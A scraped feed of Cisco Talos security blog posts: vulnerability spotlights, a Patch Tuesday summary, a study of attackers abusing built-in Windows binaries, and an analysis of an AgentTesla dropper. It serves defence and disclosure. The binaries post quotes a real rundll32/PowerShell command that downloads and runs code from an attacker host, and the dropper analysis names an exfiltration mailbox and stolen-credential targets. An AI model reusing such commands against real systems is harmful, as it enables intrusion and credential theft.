Quantcast
Channel: Cisco Talos Blog
Viewing all 2032 articles
Browse latest View live

Vulnerability Spotlight: Remote code execution vulnerability in Microsoft Excel

$
0
0

Marcin “Icewall” Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Cisco Talos recently discovered a remote code execution vulnerability in Microsoft Excel. Microsoft disclosed this bug as part of their monthly security update Tuesday. This vulnerability exists in the component responsible for handling the “MicrosoftÆ Office HTML and XML” format introduced in Microsoft Office 2000. A specially crafted XLS file could lead to a user-after-free vulnerability and remote code execution. Microsoft released a patch for this vulnerability in this month's Patch Tuesday security update, which you can read more about here.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Microsoft Office Excel WorksheetOptions code execution vulnerability (TALOS-2019-0886/CVE-2019-1448)

An exploitable use-after-free vulnerability exists in the mso.dll of Microsoft Office. A specially crafted XLS file can cause a use after free, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that Microsoft Office Professional Plus 2016 x86 and Microsoft Office 365 ProPlus x86 are affected by this vulnerability.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 51123, 51124


Vulnerability Spotlight: Remote code execution vulnerability in Microsoft Media Foundation

$
0
0

Marcin Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Microsoft Media Foundation’s framework contains a remote code execution vulnerability that exists due to a use-after-free condition. This specific bug lies in Media Foundation's MPEG4 DLL. An attacker could provide a user with a specially crafted QuickTime file to exploit this vulnerability. Microsoft disclosed this vulnerability in this month’s Patch Tuesday. For more on the updates here, and see the Snort rules that provide coverage here.
Microsoft released, read Talos’ full blog

In accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Microsoft Media Foundation CMP4MetadataHandler AddQTMetadata code execution vulnerability (TALOS-2019-0912/CVE-2019-1430)

An exploitable use-after-free vulnerability exists in the mfmp4srcsnk.dll of Microsoft Media Foundation. A specially crafted QuickTime file can cause a use-after-free condition, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that this vulnerability affects the 32-and 64-bit versions of Windows 10 Media Foundation MPEG4 Source and Sink DLL, version 10.0.18362.207 (WinBuild.160101.0800), version 12.0.18362.1 of Windows Media Player and version 44.18362.267.0 of Microsoft Edge.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 51673 - 51680

Microsoft Patch Tuesday — Nov. 2019: Vulnerability disclosures and Snort coverage

$
0
0











By Jon Munshaw.

Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday discloses 75 vulnerabilities, 13 of which are considered "critical," with the rest being deemed "important."

This month’s security update covers security issues in a variety of Microsoft services and software, including the Scripting Engine, the Windows Hyper-V hypervisor, and Win32. Cisco Talos discovered one of these vulnerabilities, CVE-2019-1448—a remote code execution vulnerability in Microsoft Excel. For more on this bug, read our full Vulnerability Spotlight here. We are also disclosing a remote code execution vulnerability in Microsoft Media Foundation.

Talos also released a new set of SNORTⓇ rules that provide coverage for some of these vulnerabilities. For more, check out the Snort blog post here.

Critical vulnerabilities

Microsoft disclosed 13 critical vulnerabilities this month, nine of which we will highlight below.

CVE-2019-0721, CVE-2019-1389, CVE-2019-1397 and CVE-2019-1398 are all vulnerabilities in Windows Hyper-V that could allow an attacker to remotely execute code on the victim machine. These bugs arise when Hyper-V on a host server improperly validates input from an authenticated user on a guest operating system. An attacker can exploit these vulnerabilities by running a specially crafted application on a guest OS. This could allow a malicious user to escape the hypervisor or a sandbox.

CVE-2019-1390 is a remote code execution vulnerability in VBScript. This vulnerability could allow an attacker to corrupt memory in a way that would enable them to execute remote code in the context of the current user. A user could trigger this vulnerability by visiting an attacker-created website while using the Internet Explorer browser, or by opening an Office document or application that contains an ActiveX control marked "safe for initialization."

CVE-2019-1426, CVE-2019-1427, CVE-2019-1428 and CVE-2019-1429 are memory corruption vulnerabilities in the Microsoft Scripting Engine that could lead to remote code execution. The bugs exist in the way the Microsoft Edge web browser handles objects in memory. A user could trigger these vulnerabilities by visiting an attacker-controlled website in Edge.

The four other critical vulnerabilities are:

                Important vulnerabilities

                This release also contains 62 important vulnerabilities, one of which we will highlight below.

                CVE-2019-1020 is a security feature bypass vulnerability in the Windows secure boot process. An attacker could run a specially crafted application to bypass secure boot and load malicious software. This security update fixes the issue by blocking vulnerable third-party bootloaders. An update also needs to be applied to Windows Defender.

                The other important vulnerabilities are:

                Coverage 

                In response to these vulnerability disclosures, Talos is releasing a new SNORTⓇ rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

                These rules are: 46548, 46549, 52205 - 52209, 52212, 52213, 52216, 52217 - 52225, 52228 - 52234, 52239, 52240

                Vulnerability Spotlight: Denial-of-service vulnerability in Intel IGC64 graphics driver

                $
                0
                0

                Piotr Bania of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

                Intel’s IGC64.dll graphics driver contains a denial-of-service vulnerability. An attacker could exploit this bug by supplying a malformed pixel shader if the graphics driver is operating inside a VMware guest operating system. This type of attack can be triggered from VMware guest usermode to cause a denial-of-service attack due to an out-of-bounds read in the driver.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with Intel to ensure that these issues are resolved and that an update is available for affected customers.

                Vulnerability details

                Intel IGC64.DLL shader functionality DCL_INDEXABLE_TEMP denial-of-service vulnerability (TALOS-2019-0845/CVE-2019-14574)

                An exploitable memory corruption vulnerability exists in Intel's IGC64.DLL graphics driver, versions 26.20.100.6709 and 26.20.100.6861. A specially crafted pixel shader can cause an out-of-bounds memory read. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from VMware guest, affecting VMware host.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos tested and confirmed that the Intel Graphics Shader Compiler for Intel Graphics Accelerator, versions 26.20.100.6709 and 26.20.100.6861, are affected by this vulnerability if the user is using VMware Workstation 15 (15.0.4 build-12990004), with Windows 10 x64 as the guest VM.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 50295, 50296

                Vulnerability Spotlight: Command injection bug in Exhibitor UI

                $
                0
                0

                Logan Sanderson of Cisco ASIG discovered this vulnerability. Blog by Jon Munshaw.

                Exhibitor Web UI contains an exploitable command injection vulnerability in its Config editor. Exhibitor is a ZooKeeper supervisory process. Exhibitor's Web UI does not have any form of authentication, and prior to version 1.7.0, did not have any way to specify which interfaces to listen on. Exposing Exhibitor is dangerous for the ZooKeeper ensemble because Exhibitor allows the changing of the ZooKeeper configuration, and also provides a UI for viewing and modifying keys and values stored in ZooKeeper. This could eventually allow an attacker to manipulate Exhibitor when launching ZooKeeper.

                Per Cisco's vulnerability disclosure policy, we are publishing the details of this vulnerability without a patch from Exhibitor after a set deadline.

                Vulnerability details

                Exhibitor UI command injection vulnerability (TALOS-2018-0790/CVE-2019-5029)

                An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1. Arbitrary shell commands surrounded by backticks or $() can be inserted into the editor and will be executed by the Exhibitor process when it launches ZooKeeper. An attacker can execute any command as the user running the Exhibitor process.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos tested and confirmed that versions 1.0.9 through 1.7.1 of Exhibitor Web UI are affected by these vulnerabilities.

                Coverage

                The following SNORTⓇ rule will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rule: 49239

                Hunting for LoLBins

                $
                0
                0

                By Vanja Svajcer.

                Introduction

                Attackers' trends tend to come and go. But one popular technique we're seeing at this time is the use of living-off-the-land binaries — or "LoLBins". LoLBins are used by different actors combined with fileless malware and legitimate cloud services to improve chances of staying undetected within an organisation, usually during post-exploitation attack phases.

                Living-off-the-land tactics mean that attackers are using pre-installed tools to carry out their work. This makes it more difficult for defenders to detect attacks and researchers to identify the attackers behind the campaign. In the attacks we're seeing, there are binaries supplied by the victim's operating system that are normally used for legitimate purposes, but in these cases, are being abused by the attackers.

                In this post, we will take a look at the use of LOLBins through the lense of Cisco's product telemetry. We'll also walk through the most frequently abused Windows system binaries and measure their usage by analyzing data from Cisco AMP for Endpoints.

                You'll also find an overview of a few recent campaigns we've seen using LoLBins, along with recommendations for how to detect malicious LoLBins' activities.

                What are LoLBins

                A LoLBin is any binary supplied by the operating system that is normally used for legitimate purposes but can also be abused by malicious actors. Several default system binaries have unexpected side effects, which may allow attackers to hide their activities post-exploitation.

                The concept of LoLBins is not new and isn't specific to Windows. Almost all conventional operating systems, starting from the early DOS versions and Unix systems, contained executables that attackers could exploit.

                Here is an example from the mid 80s in which binary code to reboot the computer was supplied to the default debug.com DOS debugger as text, designed to avoid detection by anti-malware scanners and run malicious code as intended.

                N SET.COM
                A 100
                MOV AX,0040
                MOV DS,AX
                MOV AX,1234
                MOV [0072],AX
                JMP F000:FFF0

                RCX
                10
                W
                Q
                In their presentation at DerbyCon 3, Matthew Graeber and Christopher Campbell set the baseline for Windows, by discussing the advantages of using default Windows binaries to conduct red team activities and avoiding defensive mechanisms.

                In this post, we also focus on Windows LoLBins and their usage today.

                Overall, attackers can use LoLBins to:
                • Download and install malicious code
                • Executing malicious code
                • Bypassing UAC
                • Bypassing application control such as (WDAC)
                Attackers may be able to target other utilities that are often pre-installed by system manufacturers and may be discovered during reconnaissance. These executables can be signed utilities such as updaters, configuration programs and various third party drivers.

                The usage of LoLBins has been frequently combined with legitimate cloud services such as GitHub, Pastebin, Amazon S3 storage and cloud drives such as Dropbox, Box and Google Drive. By using legitimate cloud services for storage of malicious code, command and control (C2) infrastructure and data exfiltration attackers activities are more likely to remain undetected as the generated traffic does not differ from the traffic generated by systems that are not compromised.

                Talos is mainly interested in finding executables that can be used to download or execute malicious code. In our research, we monitor daily execution patterns of the following executables to detect their abuse:
                • powershell.exe
                • bitsadmin.exe
                • certutil.exe
                • psexec.exe
                • wmic.exe
                • mshta.exe
                • mofcomp.exe
                • cmstp.exe
                • windbg.exe
                • cdb.exe
                • msbuild.exe
                • csc.exe
                • regsvr32.exe

                Abusing PowerShell


                A primary suspect for malicious code download and in-memory execution in the recent period is PowerShell. Threat actors commonly use this command shell, which is built on the Windows management and .NET frameworks. This powerful administration environment has a security policy that can prevent the execution of untrusted code. Unfortunately, this policy can be easily circumvented with a single command line option.

                One could argue that the execution of PowerShell with the option to bypass security policy should be outright blocked. However, there are a number of legitimate tools, such as Chocolatey package manager and some system management tools that use the exact command line.

                PowerShell's code is not case-sensitive, and it will accept shortened versions of command-line options, as long as the option isn't ambiguous. For example -EncodedCommand option, which accepts a Base64-encoded string as a parameter can also be invoked as -EncodedC or even -enc, which is commonly used by malicious actors.

                Popular malware like Sodinokibi and Gandcrab have used reflect DLL loaders in the past that allows attackers to load a dynamic library into process memory without using Windows API.

                The Invoke-Obfuscation module is often used to create polymorphic obfuscated variants, which will not be detected by antivirus programs and other defensive mechanisms.

                Over time, attackers have also realized the malicious potential of PowerShell, widening the number of executables used as LoLBins. Msbuild.exe and C# compiler csc.exe are some of the most frequently used by red teams. Both are frequently used to download, build and load malicious code that is built for that particular system and does not appear on any executable block list.

                Measuring LoLBins usage

                We analyzed telemetry provided from Cisco AMP for Endpoints to measure how often LoLBins are abused. The telemetry, sent over a secure channel, contains names of invoked processes and cryptographic checksums of their file images which helps us with tracking file trajectories and building parent-child process relationships that can be used for hunting.

                An example of a process retrospection graph in AMP telemetry.

                The telemetry data is focused on detecting new attacks as they happen but it should also allow us to measure how many potential LoLBin invocations are suspicious.

                We looked at different LoLBins where the decision could be made quickly. In all cases, we're assuming the worst-case scenario and designated any invocation of the following processes with a URL as a parameter as suspicious:
                • mshta.exe
                • certutil.exe
                • bitsadmin.exe
                • regsvr32.exe
                • powershell.exe

                Our relaxed definition of suspicious process invocation means that it will also have a significant false-positive rate. For example, for PowerShell invocations with a URL in the command line, we estimate that only 7 percent of the initially chosen calls should be checked in-depth and are likely to be malicious.

                We obtain the percentage of suspicious calls by mining billions of daily data points and dividing the number of detected suspicious calls with the overall number of calls. Overall, our worst-case scenario shows that at least 99.8 percent of all LoLBins invocations are not worth further investigation.

                LoLBins and percentages of suspect invocations.

                We then distilled down these potentially suspicious calls to find the ones that are likely to be malicious.

                Once again, we will take PowerShell. The worst figure for potentially suspicious PowerShell process executions was 0.2 percent. However, as mentioned before, only 7 percent of those actually require in-depth investigation, which brings the percentage down to 0.014 percent. Therefore, at least 99.986 percent of PowerShell invocations are legitimate.

                A simple rule of thumb for URLs that can be used to pinpoint calls that are more likely to be malicious is to look for LoLBins invocation combined with:
                • External numeric IP address
                • Any .net TLD
                • Any .eu TLD
                • Any .ru TLD
                • Any URL ending with an executable or image extension (e.g. .EXE, .LNK, .DLL, .JPG, .PNG etc.)
                • Any reference to Pastebin.com and its clones
                • Any reference to Github or any other source code repository sites

                Red teams' activities


                Although the majority of recorded suspicious calls belong to malicious actors, it is worth noting that red-team activities are also visible. Here, security teams and penetration testers are often using adversarial simulation frameworks such as Red Canary Atomic tests to test the organizational defenses against tools, techniques and processes as classified in the ATT&CK knowledge base.

                Some red team tools are tailored to mimic the activity of popular tools such as Mimikatz. Here is an example of a tailor-made script hosted on GitHub to emulate the adversarial technique of using a reputable domain to store malicious code.

                Red team members using fake Mimikatz module to test defenses.

                LoLBins actors' skill levels

                In this section, we'll describe three individual campaigns, showing usage of PowerShell combined with memory-only code from three different actors with different skill sets. These campaigns can be relatively easily detected by internal hunting teams by analyzing command lines and their options.

                Case 1: Common ransomware


                The first case involves the Sodinokibi ransomware. Sodinokibi is a rather common ransomware that spreads by using standard methods like phishing and exploit kits, as well as exploiting vulnerabilities in web frameworks such as WebLogic.

                We see from telemetry that PowerShell is launched with Invoke-Expression cmdlet evaluating code downloaded from a Pastebin web page using the Net.WebClient.DownloadString function, which downloads a web page as a string and stores it in memory.

                Initial Sodinokibi PowerShell invocation.

                The downloaded code is a reflective DLL loader with randomized function names to avoid simple pattern-based detection engines. The ransomware payload is Base64-encoded and stored in the variable $PEBytes32. It is worth noting that Base64 executable payloads can be instantly recognized by the initial two characters "TV," which get decoded into characters "MZ" for the start of DOS executable stub of a PE32+ executable file.

                Reflective DLL loader loads Sodinokibi payload

                Sodinokibi and Gandcrab are very common, but that does not mean that the actors behind them are not technically proficient. Although they use off-the-shelf techniques to spread and execute payloads, we can still estimate that they have an intermediate skill level.

                Case 2: Intermediate miner

                Our second actor used the PowerShell ability to obfuscate code and deobfuscate several layers of obfuscation in memory before reaching the actual PowerShell script that installs and launches a cryptocurrency-mining payload.

                First invoke-obfuscation layer decoded

                The Invoke-Obfuscation module is often used for PowerShell obfuscation. Apart from obfuscating the whole next layer script code, it also hides the invocation on Invoke-Expression (IEX) cmdlet. In this example, the $Env:COMSpec variable contains the string "C:\Windows\System\cmd.exe" so that joined fourth, 15th and 25th character form the string "iex."

                This cryptocurrency miner had five deobfuscation stages and in the final one, the invocation of IEX was hidden by getting the name of the variable MaximumDriveCount using "gv" (Get-Variable cmdlet) with the parameter "*mdr*" and choosing characters 3, 11 and 2 to form it.

                Extracting 'iex' from MaximumDriveCount

                The downloaded PowerShell scripts contain the functionality to disable Windows Defender, Malwarebytes and Sophos anti-malware software, to install modified XMRig cryptocurrency payload and download modules with the intention to steal user credentials from memory and use the credentials to attempt to spread laterally by passing the hash (Invoke-TheHash) through SMB or WMI.

                Deobfuscated crypto-miner loader


                Case 3: Hiding Cobalt Strike in network traffic


                Our final case study shows the activities of a more advanced actor. The actor uses Cobalt Strike beacon for their post-exploitation activities with a PowerShell stager taken from the Cobalt Strike framework.

                The telemetry shows this attack launched by abusing rundll32.exe and the command line invoking JScript code to download a web page and launch the initial PowerShell stager.

                rundll32.exe javascript:\\..\\mshtml,RunHTMLApplication ;document.write();new%20ActiveXObject(WScript.Shell).Run(powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('hxxps://stjohnplece.co/lll/webax.js');

                The first PowerShell stage, webax.js, despite misleading filename extension, decompresses the second-stage PowerShell code that loads the first shellcode stage into memory and creates a specific request to download what seems like a standard jQuery JavaScript library.

                Cobalt Strike PowerShell stager

                The shellcode creates an HTTP GET request to the IP address 134.209.176.24, but with header fields that indicate that the host we are looking for is code.jquery.com, the legitimate host serving jQuery. This technique seems to successfully bypass some automated execution environments which in their analysis results show that the request went to the legitimate host and not to the malicious IP address.

                HTTP header with the spoofed host field

                The downloaded malicious jQuery starts with the actual jQuery code in the first 4,015 bytes, followed by the obfuscated Cobalt Strike beacon, which gets deobfuscated with a static XOR key and loaded into memory using reflective loading techniques.


                The beginning and the end of malicious jQuery and Cobalt Strike payload

                The malicious jQuery ends with 1,520 bytes of the actual jQuery code, presumably to avoid anti-malware scanners scanning the request top and tail.

                This technique of hiding binary payload within jQuery library and evasion of malicious IP address detection shows that we are dealing with a more advanced actor, which takes their operational security seriously.

                Overall, we cannot pinpoint a single type of actor that focuses on using LoLBins. Although they may have been used only by more advanced actors, today they are also used by actors employing common malicious code such as ransomware or cryptominers.

                Detecting and preventing LoLBins abuse

                The protection against abuse of LoLBins combined with fileless code is difficult for security controls that do not monitor process behavior. The abuse can be detected based on the parent-child relationship of the launched processes as well as anomalies in network activity of processes that are not usually associated with network communication.

                Organizations are advised to configure their systems for centralized logging where further analytics can be performed by hunting teams. Since version 5, PowerShell can also be configured to log execution of all executed code blocks to Windows event log. This allows members of security teams to understand obfuscated code which needs to be deobfuscated before it is run. The execution of the deobfuscated code will be visible in Windows event logs.

                However, the best possible protection is to deny the execution of LoLBins using mechanisms such as Windows Defender Application Control. Microsoft created a policy block file, which will block the execution of LoLBins not required on protected systems.

                Unfortunately, blocking all LoLBins is not possible in most environments since they are also required by legitimate processes.

                Conclusion

                Our research shows that many types of actors are employing various techniques to use LoLBins in their activities, from commodity malware to more targeted attacks. However, the overall proportion of malicious usage is very low (below 0.2 percent), which is not enough to block all invocations of LoLBins.

                However, blue team members must keep LoLBins in mind while conducting regular hunting activities. If used successfully, an attacker can use these to make their attacks more difficult to trace or make their malware linger for longer on the victim machine.

                Coverage

                It is advisable to employ endpoint detection and response tools (EDR) such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. Try AMP for free here.

                Additional ways our customers can detect and block these threats are listed below.



                Cisco Cloud Web Security (CWS) orWeb Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                Email Security can block malicious emails sent by threat actors as part of their campaign.

                Network Security appliances such asNext-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

                AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                IoCs

                Sodinokibi

                dc3de6cff67f4bcb360d9fdd0fd5bd0d6afca0e1518171b8e364bb64c5446bb1
                dc788044ba918463ddea34c1128c9f4da56e0778e582ae9abdeb15fdbcc57e80

                Xmrig related

                4528341b513fb216e06899a24d3560b89636158432ba7a0a118caa992739690e
                c4ef0e90f81bac29899070d872e9ddea4531dbb5a18cdae090c19260cb0d4d83
                e0ffda3353a17f5c9b7ef1d9c51f7dc1dcece1dfa2bcc8e1c93c27e5dde3b468
                3f8d2e37a2bd83073e61ad4fc55536007076ae59a774b5d0c194a2bfab176172
                92f0a4e2b7f4fe9d4ea373e63d9b08f4c2f21b2fd6532226c3fd576647efd64a
                ebb7d224017d72d9f7462db541ac3dde38d2e7ecebfc9dca52b929373793590

                Cobalt strike stager

                522b99b5314531af6658e01ab471e1a7e0a5aa3a6ec100671dcfa0a6b0a1f52d
                4c1a9ba633f739434cc81f23de9c6c1c12cdeacd985b96404a4c2bae2e54b0f5
                f09d5ca3dfc53c1a6b61227646241847c5621b55f72ca9284f85abf5d0f06d35

                Custom dropper hide and seek

                $
                0
                0

                Executive summary

                Most users assume they are safe when surfing the web on a daily basis. But information-stealing malware can operate in the background of infected systems, looking to steal users' passwords, track their habits online and hijack personal information.

                Cisco Talos has monitored adversaries which are behind a wave of ongoing campaigns dropping well-known information-stealer like Agent Tesla, Loki-bot and others since at least January 2019. The adversaries using custom droppers, which inject the final malware into common processes on the victim machine. Once infected, the malware can steal information from many popular pieces of software, including the Google Chrome, Safari and Firefox web browsers.

                The injection techniques we're seeing in the wild are well-known and have been used for many years, but with the adversaries customizing them, traditional anti-virus systems are having a hard time detecting the embedded malware. In this post, we'll walk through one of these campaigns in detail and how the different stages of the dropper hide the malware. Any internet user is a potential target of this malware, and if infected, has the potential to completely take away a user's online privacy.


                Technical overview

                The campaigns we analyzed started with a malicious email similar to the one below:
                Figure 1 - Phishing email

                An ARJ archive is attached to this email. ARJ is an early 1990s archive format often used on the pirated software scene to convert files into archives. ARJ can split the archive into multiple smaller files. This made it easier to share these files over dial-up connections. ARJ archives can be unpacked with various tools like 7-Zip or WinRAR. Users can easily find an unpacker by double-clicking on the file and searching in the Windows Store for the appropriate software.

                We often see that adversaries use old archive formats, hoping to bypass weak email security gateways. In this case, this archive wasn't split into multiple files and it contained only a single executable with the name: "IMP_Arrival Noticedoc.exe". This actor often used filenames with the schema "...<MS Office extension>.exe. In other campaigns by this adversary, we also saw completely different names and different file types like malicious office documents acting as first stage droppers. In this blog post, we will focus on the first ones.

                Dropper

                Most of the executables are compiled, sometimes UPX packed, AutoIt scripts that can be easily decompiled. Unfortunately, as usual, the content was heavily obfuscated before compilation. Figure 2 shows the decompiled version of the script.
                Figure 2 - Decompiled version of the AutoIT script

                The deobfuscated version of the AutoIT script in Figures 3 and 4 shows that it comes with some anti-VM checks in the beginning. These checks are very typical for AgentTesla campaigns for years, you can often find them in one or the other form in the first stage droppers.
                Figure 3 - Start of the deobfuscated AutoIT script
                Figure 4 - VM checks of the deobfuscated AutoIT script
                If these checks do not find anything, it is decoding and extracting resource font type (8) names from the string in the first parameter ($data) handed over to the DecodeDataFromPEResourceOrString function (Figure 7). In the GetResourcesFromPE function (Figure 6), this parameter is converted into a string and split into the different font resource names. The result is a list of strings in the following order:
                1. SystemPropertiesDataExecutionPreventionM
                2. Windows.Media.BackgroundPlaybackK
                3. windeployL
                4. LaunchWinAppX
                5. ccaF
                6. CellularAPIQ
                7. MuiUnattendE
                8. RmClientE
                9. ucsvcG
                10. refsutilV
                11. SpeechRuntimeV
                12. DPTopologyAppv2_0N

                These font type resources are then extracted from the PE resources and concatenated to a large binary.
                Figure 5 - Resource Section of IMP_Arrival Noticedoc.exe
                Figure 6 - GetResourcesFromPE Function

                The result is stored again in the $data variable (Line 245 in Figure 7) and the order of the stored bytes is reversed by StringReverse(BinaryToString($data)) in Line 246. This is the final payload malware in an RC4 encrypted form. The variable $sopcode contains the bytes of the RC4 code. After preparing the shellcode and the encrypted payload data, the RC4 function is getting executed in line 262 and decrypts the payload.
                Figure 7 - DecodeDataFromPEResourceOrString RC4 Function

                The following pictures show the disassembled RC4 shellcode:
                Figure 8 - RC4 function ($opcode variable)

                After the payload is decrypted, the script calls the final InjectPayloadIntoProcess function to inject the payload into another process. It is offering nine different legit process options for this injection. The adversary eventually selects which one will be used by providing the corresponding number to the function.
                Figure 9 - Injection victim process selection

                In this case, the adversaries picked option one — RegAsm.exe — to hide the payload. The rest of the function is quite similar to what was already described in other blogs. It is preparing the local injection shellcode ($a5_local_shellcode) and executing it in Line 211 in Figure 10. As mentioned before, this code finally hides the payload inside of the selected legit process. The decoded payload is handed over to this injection shellcode as the last parameter ($a4_payload_code).
                Figure 10 - Process Injection code of the AutoIT script

                The AutoIT script contains several additional functions that are not used in this campaign. For example, functions for the following tasks:
                • Write a file to the TEMP directory and execute it.
                • Download a file from the internet and execute it.
                • Execute a script via the command line.
                • Privilege escalation.

                The AutoIT scripts in the different campaigns are always very similar to the one described above. It usually just differs by how they built the payload. Some scripts extract the payload from the resource section as described above, others have the encrypted payload stored in a large string inside the AutoIT script (Figure 11). The decoding function shown in Figure 7 is more or less the same, but the $rt parameter is set to -1, which means the GetResourcesFromPE function (Figure 6) doesn't do anything, except returning the unmodified content of the $data variable, or in other words the content of the $payload variable in Figure 11.
                Figure 11 - Long String based AutoIT script start

                The Injection part of these scripts always work more or less the same, Figure 12 shows an example of another script.
                Figure 12 - Long String based AutoIT script injection part

                Payload

                The injected payload is in many cases an obfuscated version of AgentTesla. The software is capable of stealing credentials from most browsers, email clients, SSH/SFTP/FTP clients and other software. Please see the IOC section below for additional details. It supports exfiltration via SMTP, FTP and HTTP exfiltration. In this case, it only used SMTP. This version is very similar to the one described by Yoroi in the payload section of their blog post, except it is not obfuscated with any obfuscator detected by the latest de4dot. Some functions are also slightly modified or reordered, but most of them are probably done by the obfuscator. We think it is close to the customized Agent Tesla version that's been circulating online since several months.
                Figure 13 - AgentTesla

                It is resolving configuration settings and suspicious strings at runtime when they are used. The function shown in Figure 10 is implemented in the executables static class constructor (.cctor). It is using the Rijndael algorithm to decrypt certain large arrays. The offset is picked based on the integer which was handed over to the function. On the right side of the screenshot, you can see the length of the array section in purple.
                Figure 14 - Agent Tesla decoding routine

                The next screenshot shows the usage at runtime. For example, decoding certain parameters for email exfiltration.
                Figure 15 - Agent Tesla string obfuscation

                The fully deobfuscated version of the function looks like this:
                Figure 16 - Agent Tesla email function (deobfuscated)

                This is the typical AgentTesla function used for years. It is interesting that it seems to be that the obfuscator is customized for this Agent Tesla version or vice versa. It looks like it is filling in variables at the time it is obfuscating the original code. In functions that are in this sample, but never used and even in a few used ones, some of the hardcoded strings are filled with variables e.g. %filename%.
                Figure 17 - Obfuscator variables

                Conclusion


                This campaign is another example of what modern malware uses to fly under the radar. With the process we've described in this post, the actors can hide the original malware inside the dropper. The malware is only decrypted at runtime and injected into memory — it's never unencrypted on the hard drive. The adversaries use complex droppers that leverage several different obfuscation techniques to make it as hard as possible for antivirus programs to detect the malware. By using these droppers, they can quickly and easily change the final malware for their campaigns. Even known malware is often successfully hidden against anti-virus systems by using these kinds of obfuscation chains.

                Coverage


                Ways our customers can detect and block this threat are listed below.

                Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.

                Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                Email Security can block malicious emails sent by threat actors as part of their campaign.


                Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

                Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                Additional protections with context to your specific environment and threat data are available from the Firepower Management Center.

                Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                IOC


                Agent Tesla Stealer capabilities found based on decoded strings:
                1. 7Star Browser
                2. Amigo Browser
                3. Apple Keychain
                4. Becky! Internet Mail
                5. Brave Browser
                6. Centi Browser
                7. Chedot Browser
                8. Chrome Browser
                9. Chromium Browser
                10. Citrio Browser
                11. Claws Mail
                12. CocCoc Browser
                13. Comodo Dragon Browser
                14. CoolNovo Browser
                15. Coowon Browser
                16. CoreFTP
                17. Cyberfox Browser
                18. DynDNS client
                19. Elements Browser
                20. Epic Privacy Browser
                21. Eudora Mail
                22. Firefox Browser
                23. FlashFXP FTP client
                24. Flock Browser
                25. Foxmail
                26. FTPCommander
                27. FTPGetter
                28. FTP Navigator
                29. i360 Browser
                30. IceCat Browser
                31. IceDragon Browser
                32. IE/Edge Browser
                33. Incredimail
                34. Internet Download Manager
                35. Iridium Browser
                36. JDownloader
                37. Keylogger
                38. K-Meleon Browser
                39. Kometa Browser
                40. Liebao Browser
                41. Mozilla SeaMonkey
                42. Netgate BlackHawk Browser
                43. NoIP DNS client
                44. Open VPN
                45. Opera Browser
                46. Opera Mail
                47. Orbitum Browser
                48. Outlook
                49. Pale Moon Browser
                50. Paltalk Video Chat
                51. PassWd
                52. Pidgin
                53. PocoMail
                54. QIP Surf
                55. QQ Browser
                56. Safari Browser
                57. Screenshots
                58. Sleipnir 6 Browser
                59. SmartFTP
                60. Sputnik Browser
                61. SRWare Iron Browser
                62. TheBat! Email client
                63. Thunderbird
                64. Torch Browser
                65. Trillian
                66. UC Browser
                67. uCozMedia Uran
                68. Vivaldi Browser
                69. WaterFox Browser
                70. Wi-Fi Credentials and Profiles
                71. Windows Credentials
                72. Windows Domain Certificate Credential
                73. Windows Domain Password Credential
                74. Windows Extended Credential
                75. Windows Generic Credential
                76. Windows Secure Note
                77. Windows Web Password Credential
                78. WinSCP
                79. WS_FTP Pro FTP client
                80. Yandex Browser

                Email:
                Email: torre@casadavilas.com
                Mailserver: mail.casadavilas.com

                Malware moved to:
